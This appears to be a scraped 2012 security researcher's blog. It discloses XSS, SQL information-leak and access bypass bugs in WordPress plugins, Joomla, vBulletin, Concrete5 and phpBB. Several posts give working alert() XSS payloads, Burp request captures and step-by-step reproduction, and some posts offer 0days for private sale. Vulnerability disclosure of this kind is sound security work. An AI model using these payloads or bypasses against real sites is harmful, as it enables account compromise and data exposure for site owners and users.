 | |
| RCE in latest GetSimple CMS |
One of five exploits is here.
To all of you, who mailed me with feedback - thanks!
If you need 4 sploit more (to testing) - just let me know;)
o/
Thursday, 27 December 2012
[EN] 5 RCE in GetSimple 3.1.2 - Updated
Latest GetSimple CMS (3.1.2) is vulnerable to authentication bypass, and remote code exec.
One of five exploits is here.
To all of you, who mailed me with feedback - thanks!
If you need 4 sploit more (to testing) - just let me know;)
o/
One of five exploits is here.
To all of you, who mailed me with feedback - thanks!
If you need 4 sploit more (to testing) - just let me know;)
o/
Monday, 24 December 2012
[EN] OSSEC Cool Dashboard - New release!
Friday, 21 December 2012
Thursday, 20 December 2012
[EN] Joomla 3.0.2 leaked again
Joomla 3.0.2 is vulnerable to sql leak.
If user supplied malformed data to cookie (by adding a value to md5 string), then
sql leak is possible and Joomla's table names prefix can be read.
... and now you can see an error from <prefix>_session table:
:)
If you watch this request/response you will see that those screens was created from 'administrators' link. To stop comments like 'not usefull because possible from admin' - try to reproduce this from normal (registered) or pre-auth user. ;)
Another place where user can input malformed data, looks like this:
cheers
If user supplied malformed data to cookie (by adding a value to md5 string), then
sql leak is possible and Joomla's table names prefix can be read.
 |
| Add 'malformed' value here - Burp |
... and now you can see an error from <prefix>_session table:
 | |
| SQL Leak - now you know what is the prefix |
:)
If you watch this request/response you will see that those screens was created from 'administrators' link. To stop comments like 'not usefull because possible from admin' - try to reproduce this from normal (registered) or pre-auth user. ;)
Another place where user can input malformed data, looks like this:
 | |
| SQL Leak |
cheers
[EN] Constant Contact for WordPress 2.3.12 XSSed
Constant Contact for WordPress 2.3.12 is vulnerable to XSS attack.
cc_username and cc_password parameters are vulnerable to persistent XSS.
cc_username and cc_password parameters are vulnerable to persistent XSS.
[EN] Dooodl (1.1.4) XSSed
"History Viewer Look & Feel" in latest Dooodl is vulnerable to persistent XSS.
All forms available at wp-admin/admin.php?page=dooodl_gallery_layout&settings-updated=true
are vulnerable to XSS attack.
Add filtering for user input for parameters described as:
Body backgroundcolor, Dooodl item backgroundcolor, Link backgroundcolor, Link textcolor,
Title textcolor, General textcolor, Title backgroundcolor, Intro backgroundcolor, Intro textcolor
All forms available at wp-admin/admin.php?page=dooodl_gallery_layout&settings-updated=true
are vulnerable to XSS attack.
Add filtering for user input for parameters described as:
Body backgroundcolor, Dooodl item backgroundcolor, Link backgroundcolor, Link textcolor,
Title textcolor, General textcolor, Title backgroundcolor, Intro backgroundcolor, Intro textcolor
[EN] Constant Contact for WordPress 2.3.12 XSSed
In latest Constant Contact for WordPress (2.3.12) we have two vulnerable parameters.
cc_username and cc_password parameters are vulnerable to persistent XSS.
cc_username and cc_password parameters are vulnerable to persistent XSS.
[EN] Admin Menu Editor XSSed
Latest version of "Admin Menu Editor" (1.1.13) plugin is vulnerable to persistent XSS attack.
Try to add some filtering in "Menu title" form ;)
Try to add some filtering in "Menu title" form ;)
[EN] Google Analyticator 6.4.1 XSSed
Google Analyticator 6.4.1 is vulnerable to cross-site scripting.
'Download extensions to track' is vulnerable to XSS.
Also ga_adsense, ga_extra, ga_extra_after and ga_outbound_prefix parameters are also vulnerable to XSS.
'Download extensions to track' is vulnerable to XSS.
Also ga_adsense, ga_extra, ga_extra_after and ga_outbound_prefix parameters are also vulnerable to XSS.
[EN] Faster Image Insert 2.4.0 XSSed
Faster Image Insert (2.4.0) is vulnerable to XSS attack.
'Set custom string' form is vulnerable to XSS.
'Custom post types' is also vulnerable.
'Set custom string' form is vulnerable to XSS.
'Custom post types' is also vulnerable.
[EN] Events Manager 5.3.2.1 XSSed
Events Manager 5.3.2.1 is vulnerable to cross-site scripting.
'pno', '_wpnonce', 'cols', 'limit' parameters are vulnerable to XSS.
'Bypass' for include xss code for limit parameter can be done by adding:
limit="></option></select><img src=x onerror=alert(1)><option>
(because you must close <option> and <select> tags and then add xss).
'pno', '_wpnonce', 'cols', 'limit' parameters are vulnerable to XSS.
'Bypass' for include xss code for limit parameter can be done by adding:
limit="></option></select><img src=x onerror=alert(1)><option>
(because you must close <option> and <select> tags and then add xss).
[EN] Google Analytics for WordPress 4.2.8 XSSed
Google Analytics for WordPress (4.2.8) is vulnerable to cross-site scripting.
In wp-admin/options-general.php?page=google-analytics-for-wordpress page
go to "Internal Links to Track as Outbound" and as a 'Internal links to track as outbound'
form, type your XSS code.
'Label to use' form is also vulnerable. Both are persistent.
In wp-admin/options-general.php?page=google-analytics-for-wordpress page
go to "Internal Links to Track as Outbound" and as a 'Internal links to track as outbound'
form, type your XSS code.
'Label to use' form is also vulnerable. Both are persistent.
Tuesday, 18 December 2012
[EN] Installing WP-plugins without FTP server
Few times when I was testing some plugins for Wordpress I was wondering how can I install plugin without FTP server. Wordpress after default installation needs configured ftp when you want to install new plugin, but here is one quick-hack I found at net:
Edit your wp-config.php file and add there line:
define('FS_METHOD', 'direct');
Now save your file, and enjoy installing plugins without ftp server. :)
Cheers
o/
Edit your wp-config.php file and add there line:
define('FS_METHOD', 'direct');
Now save your file, and enjoy installing plugins without ftp server. :)
Cheers
o/
[EN] WP-StatsDashboard XSSed
http://wordpress.org/extend/plugins/wp-stats-dashboard/
Very nice WordPress plugin. But it's vulnerable to XSS :)
When you're in 'Basic settings' type your 'Blog ID' name in HTML :]
This post will be updated, because in this plugin we will have more bugs.
Cheers o/
Very nice WordPress plugin. But it's vulnerable to XSS :)
When you're in 'Basic settings' type your 'Blog ID' name in HTML :]
This post will be updated, because in this plugin we will have more bugs.
Cheers o/
[EN] FIAGallery 2.16 Persistent XSS
Sure it's another 'admin' XSS, anyway - bug is bug ;)
Check it out at http://wordpress.org/extend/plugins/flash-album-gallery/.
Add htmlentities() to display this variable.
 | |
| XSSed parameter |
Add htmlentities() to display this variable.
[EN] ReFlex Gallery 1.3 - Persistent XSS
ReFlex Gallery 1.3 - Multiple persistent XSS:
http://wordpress.org/extend/plugins/reflex-gallery/
'Enter Gallery Name' and 'Enter Gallery Description' are vulnerable to XSS.
Try to filter inputs from users in add-gallery.php:
<code>
43: <p><input type="text" name="galleryCode" value="[ReflexGallery id='<?php echo $this->reflexdb->getNewGalleryId(); ?>']" size="40" /></p></div>
70: <td><input type="text" size="30" name="galleryName" value="<?php echo $galleryName; ?>" /></td>
75: <td><input type="text" size="50" name="galleryDescription" value="<?php echo $galleryDescription; ?>" /></td>
</code>
To patch it, just add htmentities(). Like this:
<code>
kuba@box:~/public_html/wp3.5/wordpress/wp-content/plugins/reflex-gallery/admin$ grep htmlentities -n add-gallery.php
70: <td><input type="text" size="30" name="galleryName" value="<?php echo htmlentities($galleryName); ?>" /></td>
75: <td><input type="text" size="50" name="galleryDescription" value="<?php echo htmlentities($galleryDescription); ?>" /></td>
kuba@box:~/public_html/wp3.5/wordpress/wp-content/plugins/reflex-gallery/admin$
</code>
:)
http://wordpress.org/extend/plugins/reflex-gallery/
'Enter Gallery Name' and 'Enter Gallery Description' are vulnerable to XSS.
Try to filter inputs from users in add-gallery.php:
<code>
43: <p><input type="text" name="galleryCode" value="[ReflexGallery id='<?php echo $this->reflexdb->getNewGalleryId(); ?>']" size="40" /></p></div>
70: <td><input type="text" size="30" name="galleryName" value="<?php echo $galleryName; ?>" /></td>
75: <td><input type="text" size="50" name="galleryDescription" value="<?php echo $galleryDescription; ?>" /></td>
</code>
To patch it, just add htmentities(). Like this:
<code>
kuba@box:~/public_html/wp3.5/wordpress/wp-content/plugins/reflex-gallery/admin$ grep htmlentities -n add-gallery.php
70: <td><input type="text" size="30" name="galleryName" value="<?php echo htmlentities($galleryName); ?>" /></td>
75: <td><input type="text" size="50" name="galleryDescription" value="<?php echo htmlentities($galleryDescription); ?>" /></td>
kuba@box:~/public_html/wp3.5/wordpress/wp-content/plugins/reflex-gallery/admin$
</code>
:)
[EN] WP Easy Gallery 2.6 XSS'ed - updated
Multiple XSS vulnerabilities found in latest WP Easy Gallery:
XSS is possible because parameter "galleryName" is not filtered.
User can add JS/HTML as a 'Gallery Name', so exploitation is possible.
As you can see below, 'galleryDescription' is also vulnerable.
If you want to check which one parameter is vulnerable here too, type at console:
<code>
kuba@box:~/public_html/wp3.5/wp-content/plugins/wp-easy-gallery/admin$ grep -n echo add-gallery.php | grep php | grep -e "\\$"
(...)
75: <td><input type="text" size="30" name="galleryName" value="<?php echo $galleryName; ?>" /></td>
80: <td><input type="text" size="50" name="galleryDescription" value="<?php echo $galleryDescription; ?>" /></td>
85: <td><input id="upload_image" type="text" size="36" name="upload_image" value="<?php echo $imagepath; ?>" />
91: <td><input type="text" size="10" name="gallerythumbwidth" value="<?php echo $thumbwidth; ?>" /></td>
96: <td><input type="text" size="10" name="gallerythumbheight" value="<?php echo $thumbheight; ?>" /></td>
(...)
kuba@box:~/public_html/wp3.5/wp-content/plugins/wp-easy-gallery/admin$
</code>
------------------------------------
Update:
Also parameter "select_gallery" is vulnerable to this attack.
Update : 27.12.2012:
galleryName, galleryDescription, upload_image, gallerythumbwidth, gallerythumbheight
parameters are not filtered after users input.
Payload to reproduce this vulnerability:
']"/><body onload=alert(/boom/)>
XSS is possible because parameter "galleryName" is not filtered.
User can add JS/HTML as a 'Gallery Name', so exploitation is possible.
As you can see below, 'galleryDescription' is also vulnerable.
If you want to check which one parameter is vulnerable here too, type at console:
<code>
kuba@box:~/public_html/wp3.5/wp-content/plugins/wp-easy-gallery/admin$ grep -n echo add-gallery.php | grep php | grep -e "\\$"
(...)
75: <td><input type="text" size="30" name="galleryName" value="<?php echo $galleryName; ?>" /></td>
80: <td><input type="text" size="50" name="galleryDescription" value="<?php echo $galleryDescription; ?>" /></td>
85: <td><input id="upload_image" type="text" size="36" name="upload_image" value="<?php echo $imagepath; ?>" />
91: <td><input type="text" size="10" name="gallerythumbwidth" value="<?php echo $thumbwidth; ?>" /></td>
96: <td><input type="text" size="10" name="gallerythumbheight" value="<?php echo $thumbheight; ?>" /></td>
(...)
kuba@box:~/public_html/wp3.5/wp-content/plugins/wp-easy-gallery/admin$
</code>
------------------------------------
Update:
Also parameter "select_gallery" is vulnerable to this attack.
Update : 27.12.2012:
galleryName, galleryDescription, upload_image, gallerythumbwidth, gallerythumbheight
parameters are not filtered after users input.
Payload to reproduce this vulnerability:
']"/><body onload=alert(/boom/)>
[EN] Concrete5 CMS 6.0.2 - multiple vulnerabilities
Hi,
Concrete5 Team is creating a patch for my last few findings.
Once the patch is released, a more detailed info will be published.
Cheers,
o/
Concrete5 Team is creating a patch for my last few findings.
Once the patch is released, a more detailed info will be published.
Cheers,
o/
[EN] ATutor 2.1 vulnerabilities
Hi,
few findings at Atutor CMS .
I must say that Developers Team is really fast :)
Good job, thanks!
(Post will be updated as soon as dev-team will release the patch.)
* Update 20.12.2012 *
Today dev team send me information about patch.
Post will be updated as soon as possible.
o/
few findings at Atutor CMS .
I must say that Developers Team is really fast :)
Good job, thanks!
(Post will be updated as soon as dev-team will release the patch.)
* Update 20.12.2012 *
Today dev team send me information about patch.
Post will be updated as soon as possible.
o/
[EN] phpWebSite XSS
In cooperation with Matt, I would like to present you new patch for phpWebSite 1.7.3 :)
Matt, thanks for a fast reply and writting patch. It was pleasure to work with you!
Details here, so update please ;)
Matt, thanks for a fast reply and writting patch. It was pleasure to work with you!
Details here, so update please ;)
Monday, 17 December 2012
[EN] LinkedIn.com XSSed
Yes yes, LinkedIn is vulnerable to persistent XSS :)
I found a vulnerability for users logged in. This time it is stored (persistent) XSS.
But it will be 'private' until LinkedIn Staff will secure it.
Cheers
o/
I found a vulnerability for users logged in. This time it is stored (persistent) XSS.
But it will be 'private' until LinkedIn Staff will secure it.
Cheers
o/
Tuesday, 27 November 2012
News for 27.11.2012
Hi there,
thanks for watching and all your emails! ;)
Finally I decide to publish here some news for you, so watch me carefully,
changes soon.
cheers
o/
thanks for watching and all your emails! ;)
Finally I decide to publish here some news for you, so watch me carefully,
changes soon.
cheers
o/
Tuesday, 11 September 2012
News for 09.2012
Hi ;]
As You can see, blog is not updated since last few days.
It's all because of my new job! :)
So if You have any questions, ask me directly via e-mail please.
I will answer (as always) asap.
Cheers! o/
As You can see, blog is not updated since last few days.
It's all because of my new job! :)
So if You have any questions, ask me directly via e-mail please.
I will answer (as always) asap.
Cheers! o/
Thursday, 30 August 2012
[EN] Persistent XSS in Concrete5.5.2.1 - 31.08 updated
* persistent xss
+ sql leak
... still testing so more - soon! ;]
BIG thanks to Concrete5 Team for a fast reply, and fix! :)
Impressive!
* updated at 31.08 *
Check some changes here and here.
Also You can try new version of Concrete5 here.
+ sql leak
... still testing so more - soon! ;]
* updated at 00:33 *
BIG thanks to Concrete5 Team for a fast reply, and fix! :)
Impressive!
* updated at 31.08 *
Check some changes here and here.
Also You can try new version of Concrete5 here.
Wednesday, 29 August 2012
[EN] TomatoCart 1.1.7 vulnerable to XSS
For example:
../tomatocart/ext/securimage/example_form.ajax.php:39:
new Ajax.Request('<?php echo $_SERVER['PHP_SELF'] ?>',
Cheers o/
Monday, 27 August 2012
[EN] Reflected XSS in latest e107 CMS (1.0.1)
Hi ;)
Some one asked me about this case in mail, so here is the answer:
1. Go to 'register' page:
2. As Your e-mail confirmation, add yourm@il + code from screen nr 3:
3. View from Burp Proxy:
4. ... and another one, parameters:
Cheers ;)
o/
Some one asked me about this case in mail, so here is the answer:
1. Go to 'register' page:
3. View from Burp Proxy:
4. ... and another one, parameters:
Cheers ;)
o/
Saturday, 25 August 2012
[EN] phpBB 3.0.10 with 'stopped MySQL' funny one
Hi ;]
Check it out: when You ('for example') have some 'troubles'* with Your database,
then 'me as a pentester' can get some 'usefull' information, when You have also installed phpBB. Idea is crazy but... it's just a talk, so ... ;)
Anyway, looks like this:
... and we can do it like that:
Two (paranoid;)) scenarios:
- first: Your database (port) is ddosed/maybe crashed by some 'time limit'/to-many-connection-from-webapp-situations, and so on...
- second: database stopped in this or other way.
...and now: "plus" 'all above', if You have installed (default) phpBB 3.0.10,
You can get this information: "this maybe is default installed 'all'-server-soft"...
:) So, like I said, this 'could be' valuable information for tester, because now
he/she can 'hit' other "defaults", for example, with DirBuster, nmap, and so on.
How to repair that? Maybe quick-fix should be to remove 'adding' line about
where is .sock-file?
Let me know what do You think :)
Enjoy Your weekend!
o/
Check it out: when You ('for example') have some 'troubles'* with Your database,
then 'me as a pentester' can get some 'usefull' information, when You have also installed phpBB. Idea is crazy but... it's just a talk, so ... ;)
Anyway, looks like this:
 |
| 'Idea'-info... |
... and we can do it like that:
Two (paranoid;)) scenarios:
- first: Your database (port) is ddosed/maybe crashed by some 'time limit'/to-many-connection-from-webapp-situations, and so on...
- second: database stopped in this or other way.
...and now: "plus" 'all above', if You have installed (default) phpBB 3.0.10,
You can get this information: "this maybe is default installed 'all'-server-soft"...
:) So, like I said, this 'could be' valuable information for tester, because now
he/she can 'hit' other "defaults", for example, with DirBuster, nmap, and so on.
How to repair that? Maybe quick-fix should be to remove 'adding' line about
where is .sock-file?
Let me know what do You think :)
Enjoy Your weekend!
o/
Saturday, 4 August 2012
[EN] JavaScript Payload - GET Idea (1)
Hi,
maybe You'll get the idea of 'how XSS can be used at your page'
after a lecture this sample code:)
Enjoy and remember to test Your webapps! ;)
Code @ pastebin
o/
maybe You'll get the idea of 'how XSS can be used at your page'
after a lecture this sample code:)
Enjoy and remember to test Your webapps! ;)
Code @ pastebin
o/
Wednesday, 1 August 2012
[EN] This week TODO
Hi,
to the end of this week, I will publish here few posts about what I'm doing right now. For now, it'll be:
- my new presentation about web security (will be here today/tommorow),
- few examples of XHR attacks,
- maybe some new bugs (if time permits... ;) ).
So - see You soon! ;)
Have a nice day
o/
to the end of this week, I will publish here few posts about what I'm doing right now. For now, it'll be:
- my new presentation about web security (will be here today/tommorow),
- few examples of XHR attacks,
- maybe some new bugs (if time permits... ;) ).
So - see You soon! ;)
Have a nice day
o/
Tuesday, 31 July 2012
[EN] phpBB3 3.0.10 "Text-insertion bug"
Hi,
I found weird bug in phpBB3 (3.0.10).
Once again, when I'm doing webapp pentests,
vulnerable parameter is 'connected' with date (functions).
Here You have some source code from text added (permanently) to phpBB board:
Example 1:
Example 2:
If You need more details about it, let me know via comments or e-mail.
Cheers! :)
Sunday, 29 July 2012
[EN] 2 codes for building payloads
Hi,
If You like playing with Burp or Paros, probably You will get the idea
of :
/*
and:
Idea is simple, so maybe it will helps ;)
Enjoy o/
If You like playing with Burp or Paros, probably You will get the idea
of :
/*
* ascii2html.c - simple payload coder
*/
#include <stdio.h>
int main(){
char ch;
printf("what to say:\n");
while((ch = getchar()) != NULL){
printf("&#%d",ch);
}
return 0;
}
and:
/*
* ascii2url.c - simple payload coder(2)
*/
#include <stdio.h>
int main(){
char ch;
printf("what to say:\n");
while((ch = getchar()) != NULL){
printf("%%%x",ch);
}
return 0;
}
Idea is simple, so maybe it will helps ;)
Enjoy o/
[EN] Hacking vBulletin 4.2.0 via Google... :)
Hi,
I saw that few of You are watching me from some forums about let's say
'security'. ;)
That's how I found a simple trick to bypass 'authorized view only'
if You're using (last) vBulletin 4.2.0.
Ok, so. Example:
I found at stats few links like:
http://some-security;)-for.um/post-for-logged-in.bla
When I want to copy/paste this link in address bar there will be 'error':
"You are not logged in.", etc, etc...
But :)
...we can try to do one things to check this 'logged-only' content/site:)
1. Copy/paste Your '4logged-only'-link and search it via google.com
2. Next, go after 'copy' link.
3. Tadam! :D Content for logged-in users.
Enjoy ;)
o/
Thursday, 26 July 2012
[EN] phpBB3 SQL Injection - updated (31.07)
Hello :)
After a little break and multiple tasks to do, few minutes ago I found one surprise
in latest phpBB3.
This is 'so called' sql-information-leak via parameter manipulation (related to SQL).
I will not public full information today, because maybe some of You want to test Your installations before.
If so - let me know. Maybe I should help with full webapp pentest.
* updated 10:11 *
- Found second vulnerable parameter :)
* updated 28.07 *
- another two parameters are vulnerable
Cheers ;) o/
After a little break and multiple tasks to do, few minutes ago I found one surprise
in latest phpBB3.
This is 'so called' sql-information-leak via parameter manipulation (related to SQL).
I will not public full information today, because maybe some of You want to test Your installations before.
If so - let me know. Maybe I should help with full webapp pentest.
* updated 10:11 *
- Found second vulnerable parameter :)
* updated 28.07 *
- another two parameters are vulnerable
* updated 31.08 *
Detailed story once again at PacketStorm. Cheers ;) o/
Wednesday, 27 June 2012
vBulletin 4.2 persistent XSS
Because my bug leaked somehow, here you have full detailed info:
[ TITLE ....... ][ Persistent Cross-Site Scripting in vBulletin 4.2
[ DATE ........ ][ 15.06.2012
[ AUTOHR ...... ][ http://hauntit.blogspot.com
[ SOFT LINK ... ][ http://www.vbulletin.com
[ VERSION ..... ][ 4.2
[ TESTED ON ... ][ LAMP
[ ----------------------------------------------------------------------- [
[ 1. What is this?
[ 2. What is the type of vulnerability?
[ 3. Where is bug :)
[ 4. More...
[--------------------------------------------[
[ 1. What is this?
This is very nice CMS, You should try it! ;)
[--------------------------------------------[
[ 2. What is the type of vulnerability?
This is persistent cross-site scripting attack.
Vulnerability can be exploited by normal ("registered") user.
[--------------------------------------------[
[ 3. Where is bug :)
To exploit this vulnerability we need (to create/register) account of normal user:
3.1. Go to Your http://vBullet.in/forum/ and log in as a "normal user". (screen01)
3.2. After login in, we are redirecting to /activity.php (This page is called 'Activity Stream').
3.3. Now (as a registered user), we need to go to our /forum/calendar.php.
3.4. We are now at "HOME-> Calendar ->Default Calendar". Now (on right) we must click
to 'Add new event'. (screen02)
3.5. Vulnerable form here is 'Title'. To check it, type as a title something like:
test-title'><h1>Hi<br>Noam</h1><script>alert(123);</script> (screen03).
3.6. And now. Your 'new event' is added 'as a clear text' - by 'clear text' I mean
'text only, without XSS'. But...
3.7. Logout now, and log-in again. Your added XSS-code, will be presented at
first page (activity.php) for user who will log in.
If You want re-test this bug, You should create 2 users: registered1 and registered2.
Add payload ('add new event') as a registered1, and log out. Now log-in as a registered2,
and after login-page, there should be trigerred XSS.
[--------------------------------------------[
[ 4. More...
- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net
[
[--------------------------------------------[
[ Pentests - mail me.
]
[ Best regards
[
Monday, 4 June 2012
[EN] Persistent XSS for admin in WP 3.3.2 - wanna? ;)
Yes, yes, "for admin only".
...if 'admin' = user who can create something. But 'what'? ;]
I will tell first to all of You, who will send me mail ;)
(And yes, I just want to check, that you 'are' interested (or 'not') for 'bugs' in admin panels too.
Who knows, maybe some of You are paranoid like me ;P and want to 'secure all' ;D
If so, You know when You can find me ;)
Cheers o/
...if 'admin' = user who can create something. But 'what'? ;]
I will tell first to all of You, who will send me mail ;)
(And yes, I just want to check, that you 'are' interested (or 'not') for 'bugs' in admin panels too.
Who knows, maybe some of You are paranoid like me ;P and want to 'secure all' ;D
If so, You know when You can find me ;)
Cheers o/
Sunday, 3 June 2012
[EN] Joomla 2.5.4 - remote user logout bug
Yes, that seems to be, that in (still) latest Joomla (2.5.4) we have a so-called-bug.
By sending malformed request to the user, we are able to "logout" him.
Why this could be used for attack? So, badguy, can change (deface) your companys site,
and add there a password-stealer (to php code for example).
Now he can logout all users like a sniper. ;]
(Yes yes, there is a way from admin panel to do the same, but who cares...? ;))
I want finish some test right now, and for a few hours there will be update here.
...and thanks for watching at all-this-break ;)
Cheers o/
;)
By sending malformed request to the user, we are able to "logout" him.
Why this could be used for attack? So, badguy, can change (deface) your companys site,
and add there a password-stealer (to php code for example).
Now he can logout all users like a sniper. ;]
(Yes yes, there is a way from admin panel to do the same, but who cares...? ;))
I want finish some test right now, and for a few hours there will be update here.
...and thanks for watching at all-this-break ;)
Cheers o/
;)
Thursday, 24 May 2012
[EN] Hi from May ;)
This is very busy week (or month) for me (good!:D), so
right now I just want to thank You for all mails, comments
and talks. Blog will be updated very soon (for 100% before 1.06). So...
See You soon! ;)
o/
right now I just want to thank You for all mails, comments
and talks. Blog will be updated very soon (for 100% before 1.06). So...
See You soon! ;)
o/
Tuesday, 15 May 2012
Friday, 11 May 2012
[EN] Jobs for Denmark and Brazil
Friend of mine is looking for a new people to join to his company as a Suppor Team Member.
I don't know the details but if You want, let me know (via e-mail) and I will contact You directrly.
Enjoy! ;)
o/
I don't know the details but if You want, let me know (via e-mail) and I will contact You directrly.
Enjoy! ;)
o/
Monday, 7 May 2012
[EN] Ohhh, baby...
8.05 - Updated!
In a few days I will add here another 'a little article' about testing webapps.
This time we will try to check a ... aa whatever, You will see soon ... ;D
--
Thanks for watching and regards! o/
Monday, 30 April 2012
[EN] Joomla 2.5.4 "SQL Info leak"
Ok,
so maybe You have 'display_errors=On' (or sth... still) on Your site...
So try this at Your localhost:
so maybe You have 'display_errors=On' (or sth... still) on Your site...
So try this at Your localhost:
It's important to mention that if You ('attacker') get this error,
You (he is) are able to view 'randomed' Joomla-prefixes for some names.
Look at screen in JOIN query.
Cheers! o/
[EN] vBulletin 4.1.12 Cross-site scripting
[ TITLE ....... ][ vBulletin 4.1.12 Reflected XSS (try csrf*) for registered users
[ DATE ........ ][ 24.04.2012
[ AUTOHR ...... ][ http://hauntit.blogspot.com
[ SOFT LINK ... ][ http://www.vbulletin.com
[ VERSION ..... ][ 4.1.12
[ TESTED ON ... ][ LAMP
[ ----------------------------------------------------------------------- [
[ 1. What is this?
[ 2. What is the type of vulnerability?
[ 3. Where is bug :)
[ 4. More...
[--------------------------------------------[
[ 1. What is this?
This is very nice CMS, You should try it! ;)
[--------------------------------------------[
[ 2. What is the type of vulnerability?
Reflected cross-site scripting.
(* ..., because I think this could be extended to attack
with 'non-visible button'. ;))
[--------------------------------------------[
[ 3. Where is bug :)
When You are logged-in as a normal user, You can add post to forum.
You can add title (parameter "subject") of Your post only with 85 characters.
And that's the trick, because error displayed to user (if 'subject' is > 85 chars)
can contain XSS code.
Try to add Ax85+"><xss><
Screen from attack You can see below:
[--------------------------------------------[
[ 4. More...
- http://hauntit.blogspot.com
- http://www.vbulletin.com
- http://www.google.com
- http://portswigger.net
[
[--------------------------------------------[
[ Questions? Mail me.
[
[ Cheers o/
[ DATE ........ ][ 24.04.2012
[ AUTOHR ...... ][ http://hauntit.blogspot.com
[ SOFT LINK ... ][ http://www.vbulletin.com
[ VERSION ..... ][ 4.1.12
[ TESTED ON ... ][ LAMP
[ ----------------------------------------------------------------------- [
[ 1. What is this?
[ 2. What is the type of vulnerability?
[ 3. Where is bug :)
[ 4. More...
[--------------------------------------------[
[ 1. What is this?
This is very nice CMS, You should try it! ;)
[--------------------------------------------[
[ 2. What is the type of vulnerability?
Reflected cross-site scripting.
(* ..., because I think this could be extended to attack
with 'non-visible button'. ;))
[--------------------------------------------[
[ 3. Where is bug :)
When You are logged-in as a normal user, You can add post to forum.
You can add title (parameter "subject") of Your post only with 85 characters.
And that's the trick, because error displayed to user (if 'subject' is > 85 chars)
can contain XSS code.
Try to add Ax85+"><xss><
Screen from attack You can see below:
[--------------------------------------------[
[ 4. More...
- http://hauntit.blogspot.com
- http://www.vbulletin.com
- http://www.google.com
- http://portswigger.net
[
[--------------------------------------------[
[ Questions? Mail me.
[
[ Cheers o/
[EN] Buy 0days
I have few new 0days for Your webapps ;)
Latest Joomla, Wordpress, Drupal, TYPO3, vBulletin... it will be good start to talk.
If You want anything - mail me.
o/
Latest Joomla, Wordpress, Drupal, TYPO3, vBulletin... it will be good start to talk.
If You want anything - mail me.
o/
Saturday, 28 April 2012
[EN] vBulletin 4.1.12 information disclosure - (01.05 UP)
Sure :)
...I don't have a 'free May... :P
So here one example:
Right now I can not tell more, but... See You soon! ;)
* Updated - 01.05 *
And hereÄ
s the example answer:
Check this line for more "information" ;)
Enojy! o/
...I don't have a 'free May... :P
So here one example:
* Updated - 01.05 *
Hi again,
To the point: if user can add content (like ‘new
page’ – what is not in default installation;))
he can
manipulate a little with parameters to get as an answer some 'information disclosure' bug.
Check this line for more "information" ;)
Enojy! o/
Friday, 27 April 2012
[EN] Work to win 0day ;)
Yeah, yeah...;]
"Work"... like this:
currently I have few "notes" about "possible" rce bugs in few top10 webapps.
If You're interested to check it out, You know where You can find me... ;)
Regards
o/
[EN] Joomla 2.5.4 Information disclosure
Hi! :) Busy week and busy month... ;)
I have one more information for You today:
in latest Joomla I found information disclosure bug.
Why it's 'information disclosure' (for now)? Because I'm still developing working exploit for "this
parameter". I think it could be extended to other 'validation attacks'... so :D
For now, it's only 'information' (for You). ;)
I will update this information later (maybe next week), but now I have too much to do.
Anyway, if You need "no-public help", as always - mail me;)
Cheers! o/
EDIT: This is one bug I want to taka look more because it's available for not-logged-in users.
So "my favourite"! ;)
I have one more information for You today:
in latest Joomla I found information disclosure bug.
Why it's 'information disclosure' (for now)? Because I'm still developing working exploit for "this
parameter". I think it could be extended to other 'validation attacks'... so :D
For now, it's only 'information' (for You). ;)
I will update this information later (maybe next week), but now I have too much to do.
Anyway, if You need "no-public help", as always - mail me;)
Cheers! o/
EDIT: This is one bug I want to taka look more because it's available for not-logged-in users.
So "my favourite"! ;)
[EN] Wanna 0day for Your webapp? ;)
Ok. It's simple:
mail me with request for webapp (name and version) and I will tell You
what I have for it. Simple? ;)
Details we will discuss privately.
Cheers! ;)
mail me with request for webapp (name and version) and I will tell You
what I have for it. Simple? ;)
Details we will discuss privately.
Cheers! ;)
Thursday, 26 April 2012
[EN] Update for April! - finally (part 3)
As You can see below, I paste it few news. Check it out! ;)
Comments / questions are welcome!
Cheers o/
[EN] Concrete5.5.2.1 CMS is vulnerable to XSS (for logged-in users)
[ TITLE ....... ][ Concrete5.5.2.1 CMS is vulnerable to XSS (for logged-in users)
[ DATE ........ ][ 23.04.2012
[ AUTOHR ...... ][ http://hauntit.blogspot.com
[ SOFT LINK ... ][ http://concrete5.org
[ VERSION ..... ][ 5.5.2.1
[ TESTED ON ... ][ LAMP
[ ----------------------------------------------------------------------- [
[ 1. What is this?
[ 2. What is the type of vulnerability?
[ 3. Where is bug :)
[ 4. More...
[--------------------------------------------[
[ 1. What is this?
This is very nice CMS, You should try it! ;)
[--------------------------------------------[
[ 2. What is the type of vulnerability?
This is cross-site scripting.
[--------------------------------------------[
[ 3. Where is bug :)
Below I present You some traffic from Burp Proxy:
...[cut from Burp]...
GET /concrete5.5.2.1/index.php/tools/required/edit_collection_popup.php?
approveImmediately=%22%3e%3cimg%20src%3dx%20onerror%3dalert(123123123)%3e&cID=102&ctask=edit_metadata HTTP/1.1
Host: localhost
(...)
X-Requested-With: XMLHttpRequest
Cookie: CONCRETE5=...
...[end of cut]...
So vulnerable parameter is "approveImmediately", check it out:
...[answer (response) from Burp]...
(...)
<form method="post" name="permissionForm" id="ccmMetadataForm" action="http://localhost/concrete5.5.2.1/index.php?cID=102&ccm_token=...:...">
<input type="hidden" name="approveImmediately" value=""><img src=x onerror=alert(123123123)>" />
(...)
...[end of response]...
[--------------------------------------------[
[ 4. More...
- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net
[
[--------------------------------------------[
[ Ask me about new projects @ mail. ;)
]
[ Best regards
[
[EN] Concrete 5.5.2.1 Cross Site Scripting
[ TITLE ....... ][ Concrete 5.5.2.1 Cross Site Scripting
[ DATE ........ ][ 23.04.2012
[ AUTOHR ...... ][ http://hauntit.blogspot.com
[ SOFT LINK ... ][ http://www.concrete5.org/
[ VERSION ..... ][ 5.5.2.1
[ TESTED ON ... ][ LAMP
[ ----------------------------------------------------------------------- [
[ 1. What is this?
[ 2. What is the type of vulnerability?
[ 3. Where is bug :)
[ 4. More...
[--------------------------------------------[
[ 1. What is this?
This is very nice CMS, You should try it! ;)
[--------------------------------------------[
[ 2. What is the type of vulnerability?
This is cross site scripting vulnerability.
[--------------------------------------------[
[ 3. Where is bug :)
...raw cut from Burp...
POST /concrete5.5.2.1/index.php?cID=121&bID=38&arHandle=Main&ccm_token=...:...&btask=''%3b!--"%3cbody%20onload%3dalert(12312312323)%3e%3d%26{()}&method=submit_form HTTP/1.1
(...)
...end cut...
And 'cut' from answer with our 'payload':
"
(...)
